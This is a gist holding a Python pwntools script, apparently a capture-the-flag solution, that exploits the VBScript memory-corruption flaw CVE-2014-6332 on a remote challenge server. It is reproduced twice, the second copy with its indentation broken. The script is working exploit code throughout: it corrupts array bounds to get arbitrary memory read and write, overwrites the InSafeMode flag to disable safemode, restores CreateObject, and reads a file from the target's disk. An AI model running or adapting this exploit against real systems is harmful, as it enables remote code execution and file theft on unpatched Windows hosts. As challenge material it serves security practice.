seanwupi/vbs.py Secret

## vbs.py
#!/usr/bin/env python

from pwn import *  # pip install pwntools

# Ref: https://swehack.org/viewtopic.php?f=18&t=216
# CVE-2014-6332
#
# 1. Follow the steps above
# 2. Get CreateObject() by corrupt the symbol string
# 3. Turn off safemode
# 4. Create Scripting.FileSystemObject and read C:\flag.txt

r = remote('202.112.26.109', 12345)

def g(x):
  y = []
  for i in x.split('\n'):
    if i.strip():
      y.append(i.strip())
  x = ':'.join(y)
  r.recvuntil('>>>')
  print x
  r.send(x+'\n')

g('''
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
''')

g('''
  function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim  Preserve aa(a0)
    redim   ab(a0)

    redim  Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
      if(vartype(aa(a1-1))<>0)  Then
        If(IsObject(aa(a1)) = False ) Then
          type1=VarType(aa(a1))
        end if
      end if
    end if

    If(type1=&h2f66) Then
      Over=True
    End If

    redim  Preserve aa(a0)

  end function
''')

g('''
    For i = 0 To 400
      If Over()=True Then
        Exit For
      End If
    Next
''')

g('''
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
''')

g('''
  sub testaa()
  end sub
  ''')

g('''
  function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314

    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim  Preserve aa(a0)
  end function
''')

g('''
  function rm(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    rm=lenb(aa(a1))

    ab(0)=0

    redim  Preserve aa(a0)
  end function
''')

g('Print mydata()')
addr = int(r.recvuntil('\r\n'))
print 'addr =', hex(addr)

g('''
  function wm(addx)
    On Error Resume Next
    redim Preserve aa(a2)
    aa(a1+2)(addx)=ab(4)
    redim Preserve aa(a0)
  end function
''')

# Get default CreateObject() back by destroy the symbol string
# addr-1167*4: C.r.e.a.t.e.O.b.j.e.c.t
g('wm(%d)' % (addr - 1167*4 - 4))

# Turn off the safemode
# int __thiscall COleScript::InSafeMode(COleScript *__hidden this)
#     test    byte ptr [ecx+174h], 0Bh
#     push    0
#     pop     eax
#     setnz   al
#     retn
g('wm(rm(rm(%d)+16)+&h174)' % (addr+8))

# Read flag
g('Set fso = CreateObject("Scripting.FileSystemObject")')
g('Set f = fso.OpenTextFile("C:\\flag.txt")')
g('Print f.ReadLine')
print r.recvuntil('}')

r.close()
	#!/usr/bin/env python

	from pwn import * # pip install pwntools

	# Ref: https://swehack.org/viewtopic.php?f=18&t=216
	# CVE-2014-6332
	#
	# 1. Follow the steps above
	# 2. Get CreateObject() by corrupt the symbol string
	# 3. Turn off safemode
	# 4. Create Scripting.FileSystemObject and read C:\flag.txt

	r = remote('202.112.26.109', 12345)

	def g(x):
	y = []
	for i in x.split('\n'):
	if i.strip():
	y.append(i.strip())
	x = ':'.join(y)
	r.recvuntil('>>>')
	print x
	r.send(x+'\n')

	g('''
	dim aa()
	dim ab()
	dim a0
	dim a1
	dim a2
	dim a3
	dim win9x
	dim intVersion
	dim rnda
	dim funclass
	dim myarray

	Randomize()
	redim aa(5)
	redim ab(5)
	a0=13+17*rnd(6)
	a3=7+3*rnd(5)
	''')

	g('''
	function Over()
	On Error Resume Next
	dim type1,type2,type3
	Over=False
	a0=a0+a3
	a1=a0+2
	a2=a0+&h8000000

	redim Preserve aa(a0)
	redim ab(a0)

	redim Preserve aa(a2)

	type1=1
	ab(0)=1.123456789012345678901234567890
	aa(a0)=10

	If(IsObject(aa(a1-1)) = False) Then
	if(vartype(aa(a1-1))<>0) Then
	If(IsObject(aa(a1)) = False ) Then
	type1=VarType(aa(a1))
	end if
	end if
	end if

	If(type1=&h2f66) Then
	Over=True
	End If

	redim Preserve aa(a0)

	end function
	''')

	g('''
	For i = 0 To 400
	If Over()=True Then
	Exit For
	End If
	Next
	''')

	g('''
	myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
	myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
	''')

	g('''
	sub testaa()
	end sub
	''')

	g('''
	function mydata()
	On Error Resume Next
	i=testaa
	i=null
	redim Preserve aa(a2)

	ab(0)=0
	aa(a1)=i
	ab(0)=6.36598737437801E-314

	aa(a1+2)=myarray
	ab(2)=1.74088534731324E-310
	mydata=aa(a1)
	redim Preserve aa(a0)
	end function
	''')

	g('''
	function rm(add)
	On Error Resume Next
	redim Preserve aa(a2)

	ab(0)=0
	aa(a1)=add+4
	ab(0)=1.69759663316747E-313
	rm=lenb(aa(a1))

	ab(0)=0

	redim Preserve aa(a0)
	end function
	''')

	g('Print mydata()')
	addr = int(r.recvuntil('\r\n'))
	print 'addr =', hex(addr)

	g('''
	function wm(addx)
	On Error Resume Next
	redim Preserve aa(a2)
	aa(a1+2)(addx)=ab(4)
	redim Preserve aa(a0)
	end function
	''')

	# Get default CreateObject() back by destroy the symbol string
	# addr-1167*4: C.r.e.a.t.e.O.b.j.e.c.t
	g('wm(%d)' % (addr - 1167*4 - 4))

	# Turn off the safemode
	# int __thiscall COleScript::InSafeMode(COleScript *__hidden this)
	# test byte ptr [ecx+174h], 0Bh
	# push 0
	# pop eax
	# setnz al
	# retn
	g('wm(rm(rm(%d)+16)+&h174)' % (addr+8))

	# Read flag
	g('Set fso = CreateObject("Scripting.FileSystemObject")')
	g('Set f = fso.OpenTextFile("C:\\flag.txt")')
	g('Print f.ReadLine')
	print r.recvuntil('}')

	r.close()